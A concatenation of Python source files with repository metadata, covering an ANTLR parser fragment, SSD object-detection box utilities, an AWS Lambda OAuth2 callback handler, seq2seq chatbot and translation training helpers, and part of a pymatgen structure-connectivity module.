self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,41,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[7] = self.comma_expression_sempred
self._predicates[9] = self.comparison_expression_sempred
self._predicates[10] = self.range_expression_sempred
self._predicates[11] = self.in_expression_sempred
self._predicates[12] = self.or_expression_sempred
self._predicates[13] = self.xor_expression_sempred
self._predicates[14] = self.and_expression_sempred
self._predicates[15] = self.shift_expression_sempred
self._predicates[16] = self.addition_expression_sempred
self._predicates[17] = self.multiplication_expression_sempred
self._predicates[20] = self.postfix_expression_sempred
self._predicates[25] = self.list_element_sempred
self._predicates[27] = self.hash_element_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def comma_expression_sempred(self, localctx:Comma_expressionContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 2)
def comparison_expression_sempred(self, localctx:Comparison_expressionContext, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 7)
if predIndex == 2:
return self.precpred(self._ctx, 6)
if predIndex == 3:
return self.precpred(self._ctx, 5)
if predIndex == 4:
return self.precpred(self._ctx, 4)
if predIndex == 5:
return self.precpred(self._ctx, 3)
if predIndex == 6:
return self.precpred(self._ctx, 2)
def range_expression_sempred(self, localctx:Range_expressionContext, predIndex:int):
if predIndex == 7:
return self.precpred(self._ctx, 3)
if predIndex == 8:
return self.precpred(self._ctx, 2)
def in_expression_sempred(self, localctx:In_expressionContext, predIndex:int):
if predIndex == 9:
return self.precpred(self._ctx, 3)
if predIndex == 10:
return self.precpred(self._ctx, 2)
def or_expression_sempred(self, localctx:Or_expressionContext, predIndex:int):
if predIndex == 11:
return self.precpred(self._ctx, 2)
def xor_expression_sempred(self, localctx:Xor_expressionContext, predIndex:int):
if predIndex == 12:
return self.precpred(self._ctx, 2)
def and_expression_sempred(self, localctx:And_expressionContext, predIndex:int):
if predIndex == 13:
return self.precpred(self._ctx, 2)
def shift_expression_sempred(self, localctx:Shift_expressionContext, predIndex:int):
if predIndex == 14:
return self.precpred(self._ctx, 3)
if predIndex == 15:
return self.precpred(self._ctx, 2)
def addition_expression_sempred(self, localctx:Addition_expressionContext, predIndex:int):
if predIndex == 16:
return self.precpred(self._ctx, 4)
if predIndex == 17:
return self.precpred(self._ctx, 3)
if predIndex == 18:
return self.precpred(self._ctx, 2)
def multiplication_expression_sempred(self, localctx:Multiplication_expressionContext, predIndex:int):
if predIndex == 19:
return self.precpred(self._ctx, 5)
if predIndex == 20:
return self.precpred(self._ctx, 4)
if predIndex == 21:
return self.precpred(self._ctx, 3)
if predIndex == 22:
return self.precpred(self._ctx, 2)
def postfix_expression_sempred(self, localctx:Postfix_expressionContext, predIndex:int):
if predIndex == 23:
return self.precpred(self._ctx, 4)
if predIndex == 24:
return self.precpred(self._ctx, 3)
if predIndex == 25:
return self.precpred(self._ctx, 2)
def list_element_sempred(self, localctx:List_elementContext, predIndex:int):
if predIndex == 26:
return self.precpred(self._ctx, 2)
def hash_element_sempred(self, localctx:Hash_elementContext, predIndex:int):
if predIndex == 27:
return self.precpred(self._ctx, 6)
if predIndex == 28:
return self.precpred(self._ctx, 5)
if predIndex == 29:
return self.precpred(self._ctx, 4)
| 39.91071
| 630
| 0.593581
|
8cfdfe456bfa10655db24f02130c225b372ee915
| 5,754
|
py
|
Python
|
utils/box_utils.py
|
jz1248/ssd-pytorch
|
7903aeb53b78bc840eb3a0e0e805a3e3dcc85e47
|
[
"MIT"
] | 1
|
2020-08-06T01:13:54.000Z
|
2020-08-06T01:13:54.000Z
|
utils/box_utils.py
|
iwanggp/ssd-pytorch
|
ecc859bf1c5dcec99cebafea9f47f24e8c1cd88d
|
[
"MIT"
] | null | null | null |
utils/box_utils.py
|
iwanggp/ssd-pytorch
|
ecc859bf1c5dcec99cebafea9f47f24e8c1cd88d
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from PIL import Image
def point_form(boxes):
return torch.cat((boxes[:, :2] - boxes[:, 2:]/2, # xmin, ymin
boxes[:, :2] + boxes[:, 2:]/2), 1) # xmax, ymax
def center_size(boxes):
return torch.cat((boxes[:, 2:] + boxes[:, :2])/2, # cx, cy
boxes[:, 2:] - boxes[:, :2], 1) # w, h
def intersect(box_a, box_b):
A = box_a.size(0)
B = box_b.size(0)
max_xy = torch.min(box_a[:, 2:].unsqueeze(1).expand(A, B, 2),
box_b[:, 2:].unsqueeze(0).expand(A, B, 2))
min_xy = torch.max(box_a[:, :2].unsqueeze(1).expand(A, B, 2),
box_b[:, :2].unsqueeze(0).expand(A, B, 2))
inter = torch.clamp((max_xy - min_xy), min=0)
# 计算先验框和所有真实框的重合面积
return inter[:, :, 0] * inter[:, :, 1]
def jaccard(box_a, box_b):
inter = intersect(box_a, box_b)
# 计算先验框和真实框各自的面积
area_a = ((box_a[:, 2]-box_a[:, 0]) *
(box_a[:, 3]-box_a[:, 1])).unsqueeze(1).expand_as(inter) # [A,B]
area_b = ((box_b[:, 2]-box_b[:, 0]) *
(box_b[:, 3]-box_b[:, 1])).unsqueeze(0).expand_as(inter) # [A,B]
# 求IOU
union = area_a + area_b - inter
return inter / union # [A,B]
def match(threshold, truths, priors, variances, labels, loc_t, conf_t, idx):
# 计算所有的先验框和真实框的重合程度
overlaps = jaccard(
truths,
point_form(priors)
)
# 所有真实框和先验框的最好重合程度
# [truth_box,1]
best_prior_overlap, best_prior_idx = overlaps.max(1, keepdim=True)
best_prior_idx.squeeze_(1)
best_prior_overlap.squeeze_(1)
# 所有先验框和真实框的最好重合程度
# [1,prior]
best_truth_overlap, best_truth_idx = overlaps.max(0, keepdim=True)
best_truth_idx.squeeze_(0)
best_truth_overlap.squeeze_(0)
# 找到与真实框重合程度最好的先验框,用于保证每个真实框都要有对应的一个先验框
best_truth_overlap.index_fill_(0, best_prior_idx, 2)
# 对best_truth_idx内容进行设置
for j in range(best_prior_idx.size(0)):
best_truth_idx[best_prior_idx[j]] = j
# 找到每个先验框重合程度最好的真实框
matches = truths[best_truth_idx] # Shape: [num_priors,4]
conf = labels[best_truth_idx] + 1 # Shape: [num_priors]
# 如果重合程度小于threhold则认为是背景
conf[best_truth_overlap < threshold] = 0 # label as background
loc = encode(matches, priors, variances)
loc_t[idx] = loc # [num_priors,4] encoded offsets to learn
conf_t[idx] = conf # [num_priors] top class label for each prior
def encode(matched, priors, variances):
g_cxcy = (matched[:, :2] + matched[:, 2:])/2 - priors[:, :2]
g_cxcy /= (variances[0] * priors[:, 2:])
g_wh = (matched[:, 2:] - matched[:, :2]) / priors[:, 2:]
g_wh = torch.log(g_wh) / variances[1]
return torch.cat([g_cxcy, g_wh], 1)
# Adapted from https://github.com/Hakuyume/chainer-ssd
def decode(loc, priors, variances):
boxes = torch.cat((
priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],
priors[:, 2:] * torch.exp(loc[:, 2:] * variances[1])), 1)
boxes[:, :2] -= boxes[:, 2:] / 2
boxes[:, 2:] += boxes[:, :2]
return boxes
def log_sum_exp(x):
x_max = x.data.max()
return torch.log(torch.sum(torch.exp(x-x_max), 1, keepdim=True)) + x_max
# Original author: Francisco Massa:
# https://github.com/fmassa/object-detection.torch
# Ported to PyTorch by Max deGroot (02/01/2017)
def nms(boxes, scores, overlap=0.5, top_k=200):
keep = scores.new(scores.size(0)).zero_().long()
if boxes.numel() == 0:
return keep
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
area = torch.mul(x2 - x1, y2 - y1)
v, idx = scores.sort(0)
idx = idx[-top_k:]
xx1 = boxes.new()
yy1 = boxes.new()
xx2 = boxes.new()
yy2 = boxes.new()
w = boxes.new()
h = boxes.new()
count = 0
while idx.numel() > 0:
i = idx[-1]
keep[count] = i
count += 1
if idx.size(0) == 1:
break
idx = idx[:-1]
torch.index_select(x1, 0, idx, out=xx1)
torch.index_select(y1, 0, idx, out=yy1)
torch.index_select(x2, 0, idx, out=xx2)
torch.index_select(y2, 0, idx, out=yy2)
xx1 = torch.clamp(xx1, min=x1[i])
yy1 = torch.clamp(yy1, min=y1[i])
xx2 = torch.clamp(xx2, max=x2[i])
yy2 = torch.clamp(yy2, max=y2[i])
w.resize_as_(xx2)
h.resize_as_(yy2)
w = xx2 - xx1
h = yy2 - yy1
w = torch.clamp(w, min=0.0)
h = torch.clamp(h, min=0.0)
inter = w*h
rem_areas = torch.index_select(area, 0, idx)
union = (rem_areas - inter) + area[i]
IoU = inter/union
idx = idx[IoU.le(overlap)]
return keep, count
def letterbox_image(image, size):
iw, ih = image.size
w, h = size
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
image = image.resize((nw,nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (128,128,128))
new_image.paste(image, ((w-nw)//2, (h-nh)//2))
return new_image
def ssd_correct_boxes(top, left, bottom, right, input_shape, image_shape):
new_shape = image_shape*np.min(input_shape/image_shape)
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
box_yx = np.concatenate(((top+bottom)/2,(left+right)/2),axis=-1)
box_hw = np.concatenate((bottom-top,right-left),axis=-1)
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = np.concatenate([
box_mins[:, 0:1],
box_mins[:, 1:2],
box_maxes[:, 0:1],
box_maxes[:, 1:2]
],axis=-1)
print(np.shape(boxes))
boxes *= np.concatenate([image_shape, image_shape],axis=-1)
return boxes
| 32.693182
| 79
| 0.578728
|
9bf037155666da15f6b9ca1415b7b7bedeae7b9c
| 8,824
|
py
|
Python
|
callback.py
|
skeggse/terraform-aws-oauth2-authenticator
|
76df9389b2858510c21782867d63ccba7f43ceab
|
[
"MIT"
] | null | null | null |
callback.py
|
skeggse/terraform-aws-oauth2-authenticator
|
76df9389b2858510c21782867d63ccba7f43ceab
|
[
"MIT"
] | 1
|
2021-05-19T20:03:44.000Z
|
2021-05-19T20:03:44.000Z
|
callback.py
|
skeggse/terraform-aws-oauth2-authenticator
|
76df9389b2858510c21782867d63ccba7f43ceab
|
[
"MIT"
] | null | null | null |
import base64
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta, timezone
from enum import Enum
from hmac import compare_digest
import json
from os import environ
import time
from typing import Any, FrozenSet
from urllib.parse import urlparse
import weakref
import boto3
import requests
region = environ.get('AWS_REGION')
ssm_client = boto3.client('ssm', region_name=region)
cors_headers = frozenset({'access-control-request-method', 'access-control-request-headers'})
desired_headers = frozenset({*cors_headers, 'origin', 'host', 'x-forwarded-proto'})
def auth_header(req, service_config, client_secret):
auth_value = base64.b64encode(f'{service_config.client_id}:{client_secret}'.encode())
req['headers']['authorization'] = f'Basic {auth_value.decode()}'
def auth_param(req, service_config, client_secret):
req['data']['client_secret'] = client_secret
class AuthMethod(Enum):
def __new__(cls, key, fn):
obj = object.__new__(cls)
obj._value_ = key
obj.attach = fn
return obj
HEADER = ('header', auth_header)
PARAMETER = ('parameter', auth_param)
def memoize_dynamic(timeout_fn):
def inner(fn):
expiry_mapping = {}
def reset(*params):
if params in expiry_mapping:
del expiry_mapping[params]
def get(*params):
prior = expiry_mapping.get(params)
now = time.monotonic()
if prior is not None and now < prior[0]:
return prior[1]
value = fn(*params)
expiry_mapping[params] = now + timeout_fn(value), value
return value
get.reset = reset
return get
return inner
def memoize_with_timeout(timeout_sec):
return memoize_dynamic(lambda _: timeout_sec)
def memoize_with_expiry(grace_period_sec, default_valid_sec):
return memoize_dynamic(
lambda value: value.get('expires_in', default_valid_sec) - grace_period_sec
)
@dataclass(frozen=True)
class ServiceConfig(object):
service_name: str
client_id: str
secret_parameter: str
parameter_name: str
identity_field: str
identify_with_openid: bool
permitted_identities: FrozenSet[str]
token_endpoint: str
token_endpoint_auth_method: AuthMethod
redirect_uri: str
@memoize_with_timeout(timeout_sec=60)
def get_secret(self):
return json.loads(
ssm_client.get_parameter(Name=self.secret_parameter,
WithDecryption=True)['Parameter']['Value']
)
services = {
name: ServiceConfig(
service_name=name,
**{
**config,
'permitted_identities': frozenset(config['permitted_identities']),
'token_endpoint_auth_method': AuthMethod(config['token_endpoint_auth_method']),
}
)
for name, config in json.loads(environ.get('SERVICES')).items()
}
def res(status: int, body: str, content_type='text/plain; charset=utf-8'):
return dict(
statusCode=status,
headers={'content-type': content_type},
body=body,
)
def decode_jwt_unvalidated(jwt: str):
start_index = jwt.index('.')
end_index = jwt.index('.', start_index + 1)
padding = '==='[:(4 - (end_index - start_index - 1)) % 4]
return json.loads(base64.b64decode(jwt[start_index + 1:end_index] + padding, validate=False))
# TODO: actually set state in the browser to permit secondary authentication for providers like
# Fitbit that don't actually give you a human-readable (and thus human-configurable) user identity?
def lambda_handler(event, context):
# Apparently the API gateway doesn't normalize header case for us?!
headers = {
name.lower(): value
for name, value in event['headers'].items() if name.lower() in desired_headers
}
if headers.get('x-forwarded-proto') != 'https':
return res(403, 'Unsupported protocol')
# Use 'null' because it's an actual possible value for the header and simplifies the next check.
origin = headers.get('origin') or 'null'
unexpected_origin = origin != 'null' and origin != headers.get('host')
if unexpected_origin or any(header in cors_headers for header in headers):
# This is primarily to avoid cross-origin input reflection being used in some unknown
# malicious manner. Generally, browser CORS functionality will deny attempts to read the
# response, but it's better safe than sorry.
return res(403, 'Cross-origin requests not supported')
params = event.get('queryStringParameters', {})
error = params.get('error')
if error is not None:
# Reflections can be a bit scary, but with text/plain this _might_ be ok. We already try to
# prevent some of the most likely abuse by strictly denying CORS requests.
return res(500, f'Encountered error from service provider:\n\n{error}')
if params.get('state'):
return res(400, 'Malformed state')
code = params.get('code')
if code is None:
return res(400, 'Missing code parameter')
service_name = event['rawPath'][1:event['rawPath'].index('/', 1)]
service_config = services.get(service_name)
if service_config is None:
return res(404, 'Not found')
# Even though client_id isn't particularly private, we can still protect it against leaks via
# timing attacks.
provided_client_id = params.get('client_id')
if (provided_client_id is not None
and not compare_digest(service_config.client_id.encode(), provided_client_id.encode())):
return res(403, 'Wrong client_id')
client_secret = service_config.get_secret()['client_secret']
token_request = dict(
headers={},
data=dict(
code=code,
redirect_uri=service_config.redirect_uri,
client_id=service_config.client_id,
grant_type='authorization_code',
)
)
service_config.token_endpoint_auth_method.attach(token_request, service_config, client_secret)
# request_start = datetime.now(tz=timezone.utc)
response = requests.post(service_config.token_endpoint, **token_request)
if not response.ok:
if response.status_code in {401, 403}:
ServiceConfig.get_secret.reset(service_config)
try:
data = response.json()
if data.get('error') == 'invalid_grant':
description = data.get('error_description')
print(
f'Failed to exchange code due to invalid_grant: [{response.status_code}] {description}'
)
return res(400, 'Provided grant not valid')
except Exception as err:
# From simplejson.
if type(err).__name__ != 'JSONDecodeError':
raise
print(
f'Failed to exchange code for refresh_token: [{response.status_code}] {response.text}'
)
return res(500, 'Failed to authenticate with service provider')
# TODO: handle decreased scope set?
data = response.json()
if service_config.identify_with_openid:
id_token = data.get('id_token')
if id_token is None:
return res(500, 'No identity provided')
# We trust that this token is not forged, because we received it from Google over TLS.
identity = decode_jwt_unvalidated(id_token)
else:
identity = data
# Explicitly handle Google's terrible design where they provide the email in a field labeled
# email even when it's not verified.
if not identity.get('email_verified', True):
return res(403, 'Unverified users not permitted')
identity_value = identity.get(service_config.identity_field)
if identity_value not in service_config.permitted_identities:
return res(403, f'Access denied for {identity_value}')
access_token = data.get('access_token')
refresh_token = data.get('refresh_token')
if not refresh_token:
if not access_token:
return res(500, 'No authorization tokens returned by service provider')
return res(500, 'Failed to get durable access to service')
token_type = data.get('token_type')
if token_type != 'Bearer':
print(f'Got token of type `{token_type}` instead of Bearer')
# expires_at = datetime.timestamp(request_start + timedelta(seconds=data.get('expires_in', 3600)))
param_name = service_config.parameter_name
result = ssm_client.put_parameter(
Name=param_name,
Value=json.dumps(dict(refresh_token=refresh_token)),
Type='SecureString',
Overwrite=True,
)
version = result['Version']
print(f'Saved new refresh token in {param_name} as version {version}')
return res(200, 'Successfully stored new token')
| 35.580645
| 107
| 0.668178
|
3732cfbe2b887577becf6960745837d4cfa19505
| 2,683
|
py
|
Python
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 4,171
|
2017-01-29T23:58:50.000Z
|
2022-03-27T14:58:47.000Z
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 154
|
2017-03-03T12:42:46.000Z
|
2021-07-27T18:21:10.000Z
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 4,928
|
2017-01-30T05:07:08.000Z
|
2022-03-31T02:09:34.000Z
|
import os
import pickle
import copy
import numpy as np
CODES = {'<PAD>': 0, '<EOS>': 1, '<UNK>': 2, '<GO>': 3 }
def load_data(path):
"""
Load Dataset from File
"""
input_file = os.path.join(path)
with open(input_file, 'r', encoding='utf-8') as f:
return f.read()
def preprocess_and_save_data(source_path, target_path, text_to_ids):
"""
Preprocess Text Data. Save to to file.
"""
# Preprocess
source_text = load_data(source_path)
target_text = load_data(target_path)
source_text = source_text.lower()
target_text = target_text.lower()
source_vocab_to_int, source_int_to_vocab = create_lookup_tables(source_text)
target_vocab_to_int, target_int_to_vocab = create_lookup_tables(target_text)
source_text, target_text = text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int)
# Save Data
with open('preprocess.p', 'wb') as out_file:
pickle.dump((
(source_text, target_text),
(source_vocab_to_int, target_vocab_to_int),
(source_int_to_vocab, target_int_to_vocab)), out_file)
def load_preprocess():
"""
Load the Preprocessed Training data and return them in batches of <batch_size> or less
"""
with open('preprocess.p', mode='rb') as in_file:
return pickle.load(in_file)
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
"""
vocab = set(text.split())
vocab_to_int = copy.copy(CODES)
for v_i, v in enumerate(vocab, len(CODES)):
vocab_to_int[v] = v_i
int_to_vocab = {v_i: v for v, v_i in vocab_to_int.items()}
return vocab_to_int, int_to_vocab
def save_params(params):
"""
Save parameters to file
"""
with open('params.p', 'wb') as out_file:
pickle.dump(params, out_file)
def load_params():
"""
Load parameters from file
"""
with open('params.p', mode='rb') as in_file:
return pickle.load(in_file)
def batch_data(source, target, batch_size):
"""
Batch source and target together
"""
for batch_i in range(0, len(source)//batch_size):
start_i = batch_i * batch_size
source_batch = source[start_i:start_i + batch_size]
target_batch = target[start_i:start_i + batch_size]
yield np.array(pad_sentence_batch(source_batch)), np.array(pad_sentence_batch(target_batch))
def pad_sentence_batch(sentence_batch):
"""
Pad sentence with <PAD> id
"""
max_sentence = max([len(sentence) for sentence in sentence_batch])
return [sentence + [CODES['<PAD>']] * (max_sentence - len(sentence))
for sentence in sentence_batch]
| 26.83
| 110
| 0.664555
|
371b825fefe15246d3f07279fb11ab17b74f2065
| 5,558
|
py
|
Python
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 3
|
2020-11-03T14:01:49.000Z
|
2021-12-27T07:39:14.000Z
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 3
|
2020-06-04T11:40:30.000Z
|
2020-06-04T11:41:08.000Z
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 2
|
2020-06-12T14:13:32.000Z
|
2020-06-23T08:28:15.000Z
|
__author__ = "Original code by Matthew Inkawhich <https://github.com/MatthewInkawhich>, modified by Juho Leinonen"
__copyright__ = "BSD 3-Clause license, 2017, Pytorch contributors"
# The script that prepares the data and trains the models.
# coding: utf-8
#
# Chatbot Tutorial
# ================
# **Author:** `Matthew Inkawhich <https://github.com/MatthewInkawhich>`_
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
from torch.jit import script, trace
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
import csv
import random
import re
import os
import unicodedata
import codecs
from io import open
import itertools
import math
import argparse
from encoderDecoder_prep_data import *
from encoderDecoder_voc import Voc
from encoderDecoder_global_variables import *
from encoderDecoder_models import *
from encoderDecoder_training import *
from encoderDecoder_hyperparameters import *
################################################
######## ALL VARIABLES HERE ####################
################################################
parser = argparse.ArgumentParser(description='Encoder-Decoder main that ties other modules together')
parser.add_argument('job_name', type=str,
help='job id from slurm')
args = parser.parse_args()
USE_CUDA = torch.cuda.is_available()
device = torch.device("cuda" if USE_CUDA else "cpu")
random.seed(SEED)
torch.manual_seed(SEED)
# Define path to new file
inputfile = os.path.join(corpus, source_txt_file)
datafile = os.path.join(corpus, source_csv_file)
save_dir = os.path.join("../models", parent_folder_name, args.job_name)
small_batch_size = 5
# Set checkpoint to load from; set to None if starting from scratch
loadFilename = None
checkpoint_iter = 4000
#loadFilename = os.path.join(save_dir, model_name, corpus_name,
# '{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size),
# '{}_checkpoint.tar'.format(checkpoint_iter))
###############################################
######### RUNNING THE SCRIPT ##################
###############################################
printLines(os.path.join(corpus, source_txt_file))
# Load & Preprocess Data
# ----------------------
print("\nProcessing corpus...")
# Write new csv file
print("\nWriting newly formatted file...")
createSentencePairsCSV(inputfile, datafile)
# Print a sample of lines
print("\nSample lines from file:")
printLines(datafile)
# Print some pairs to validate
voc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)
print("\npairs:")
for pair in pairs[:10]:
print(pair)
# Load and trim data
# ~~~~~~~~~~~~~~~~~~
# Trim voc and pairs
pairs = trimRareWords(voc, pairs, MIN_COUNT)
# Example for validation
batches = batch2TrainData(voc, [random.choice(pairs) for _ in range(small_batch_size)])
input_variable, lengths, target_variable, mask, max_target_len = batches
print("input_variable:", input_variable)
print("lengths:", lengths)
print("target_variable:", target_variable)
print("mask:", mask)
print("max_target_len:", max_target_len)
# Load model if a loadFilename is provided
if loadFilename:
# If loading on same machine the model was trained on
checkpoint = torch.load(loadFilename)
# If loading a model trained on GPU to CPU
#checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
encoder_sd = checkpoint['en']
decoder_sd = checkpoint['de']
encoder_optimizer_sd = checkpoint['en_opt']
decoder_optimizer_sd = checkpoint['de_opt']
embedding_sd = checkpoint['embedding']
voc.__dict__ = checkpoint['voc_dict']
print('Building encoder and decoder ...')
# Initialize word embeddings
embedding = nn.Embedding(voc.num_words, hidden_size)
if loadFilename:
embedding.load_state_dict(embedding_sd)
# Initialize encoder & decoder models
encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
if loadFilename:
encoder.load_state_dict(encoder_sd)
decoder.load_state_dict(decoder_sd)
# Use appropriate device
encoder = encoder.to(device)
decoder = decoder.to(device)
print('Models built and ready to go!')
# Run Training
# ~~~~~~~~~~~~
#
# Ensure dropout layers are in train mode
encoder.train()
decoder.train()
# Initialize optimizers
print('Building optimizers ...')
encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)
decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)
if loadFilename:
encoder_optimizer.load_state_dict(encoder_optimizer_sd)
decoder_optimizer.load_state_dict(decoder_optimizer_sd)
# If you have cuda, configure cuda to call
for state in encoder_optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda()
for state in decoder_optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda()
# Run training iterations
print("Starting Training!")
trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer,
embedding, encoder_n_layers, decoder_n_layers, teacher_forcing_ratio, save_dir, n_iteration, batch_size,
print_every, save_every, clip, corpus_name, loadFilename, device)
# Conclusion
# ----------
| 30.371585
| 115
| 0.709968
|
77b03721b9e9ed767fed924883e59da8c6aab470
| 911
|
py
|
Python
|
Diddyborg_python/Legacy/pooling.py
|
puat133/DiddyBorg_Sensor_Fusion
|
60b2511d3f38fa4e913199df2a3a734c5f28ad5c
|
[
"Apache-2.0"
] | 2
|
2019-10-02T06:21:56.000Z
|
2021-05-06T17:12:35.000Z
|
Diddyborg_python/Legacy/pooling.py
|
EEA-sensors/elec-e8740-project-code-template
|
ef7020a9ed4f2ee25756dd907a16d602bffeb6fe
|
[
"Apache-2.0"
] | null | null | null |
Diddyborg_python/Legacy/pooling.py
|
EEA-sensors/elec-e8740-project-code-template
|
ef7020a9ed4f2ee25756dd907a16d602bffeb6fe
|
[
"Apache-2.0"
] | 1
|
2021-04-01T21:39:44.000Z
|
2021-04-01T21:39:44.000Z
|
import os
from multiprocessing import Pool
# processes = ('a.py','b.py', 'c.py')
processes = ('IMU.py','MotorControl.py')
def run_process(process):
os.system('python3 {}'.format(process))
pool = Pool(processes=2)
pool.map(run_process, processes)
| 75.916667
| 103
| 0.194292
|
3fab5773cbe73d0707e2e42ebebc9dd838a7b477
| 15,074
|
py
|
Python
|
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | 1
|
2020-02-08T08:20:45.000Z
|
2020-02-08T08:20:45.000Z
|
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | null | null | null |
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | null | null | null |
import networkx as nx
import numpy as np
import collections
from pymatgen.analysis.chemenv.coordination_environments.structure_environments import LightStructureEnvironments
from pymatgen.analysis.chemenv.connectivity.environment_nodes import get_environment_node
from pymatgen.analysis.chemenv.connectivity.connected_components import ConnectedComponent
from monty.json import MSONable
from monty.json import jsanitize
import logging
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__credits__ = "Geoffroy Hautier"
__version__ = "1.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "June 25, 2019"
def get_delta_image(isite1, isite2, data1, data2):
"""
Helper method to get the delta image between one environment and another
from the ligand's delta images.
"""
if data1['start'] == isite1:
if data2['start'] == isite2:
return np.array(data1['delta']) - np.array(data2['delta'])
else:
return np.array(data1['delta']) + np.array(data2['delta'])
else:
if data2['start'] == isite2:
return -np.array(data1['delta']) - np.array(data2['delta'])
else:
return -np.array(data1['delta']) + np.array(data2['delta'])
class StructureConnectivity(MSONable):
"""
Main class containing the connectivity of a structure.
"""
def __init__(self, light_structure_environment, connectivity_graph=None, environment_subgraphs=None):
"""
Constructor for the StructureConnectivity object.
Args:
light_structure_environment: a LightStructureEnvironments object
containing the relevant local environments
for the sites in the structure.
connectivity_graph: the networkx MultiGraph if it has already been computed,
e.g. stored in a file or dict and StructureConnectivity
is reconstructed from that file or dict.
environment_subgraphs: the different subgraphs of environments that have
been computed if any (as for connectivity_graph, only
if it is reconstructed from a file or dict).
"""
self.light_structure_environments = light_structure_environment
if connectivity_graph is None:
self._graph = nx.MultiGraph()
else:
self._graph = connectivity_graph
if environment_subgraphs is None:
self.environment_subgraphs = {}
else:
self.environment_subgraphs = environment_subgraphs
def environment_subgraph(self, environments_symbols=None, only_atoms=None):
if environments_symbols is not None:
self.setup_environment_subgraph(environments_symbols=environments_symbols, only_atoms=only_atoms)
try:
return self._environment_subgraph
except AttributeError:
all_envs = self.light_structure_environments.environments_identified()
self.setup_environment_subgraph(environments_symbols=all_envs, only_atoms=only_atoms)
return self._environment_subgraph
def add_sites(self):
"""
Add the sites in the structure connectivity graph.
"""
self._graph.add_nodes_from(list(range(len(self.light_structure_environments.structure))))
def add_bonds(self, isite, site_neighbors_set):
"""
Add the bonds for a given site index to the structure connectivity graph.
Args:
isite: Index of the site for which the bonds have to be added.
site_neighbors_set: site_neighbors_set: Neighbors set of the site
"""
existing_edges = self._graph.edges(nbunch=[isite], data=True)
for nb_index_and_image in site_neighbors_set.neighb_indices_and_images:
nb_index_unitcell = nb_index_and_image['index']
nb_image_cell = nb_index_and_image['image_cell']
exists = False
if np.allclose(nb_image_cell, np.zeros(3)):
for (isite1, ineighb1, data1) in existing_edges:
if np.allclose(data1['delta'], np.zeros(3)) and nb_index_unitcell == ineighb1:
exists = True
break
else:
if isite == nb_index_unitcell:
for (isite1, ineighb1, data1) in existing_edges:
if isite1 == ineighb1:
if np.allclose(data1['delta'],
nb_image_cell) or np.allclose(data1['delta'],
-nb_image_cell):
exists = True
break
else:
for (isite1, ineighb1, data1) in existing_edges:
if nb_index_unitcell == ineighb1:
if data1['start'] == isite:
if np.allclose(data1['delta'], nb_image_cell):
exists = True
break
elif data1['end'] == isite:
if np.allclose(data1['delta'], -nb_image_cell):
exists = True
break
else:
raise ValueError('SHOULD NOT HAPPEN ???')
if not exists:
self._graph.add_edge(isite, nb_index_unitcell, start=isite, end=nb_index_unitcell, delta=nb_image_cell)
def setup_environment_subgraph(self, environments_symbols, only_atoms=None):
"""
Set up the graph for predefined environments and optionally atoms.
Args:
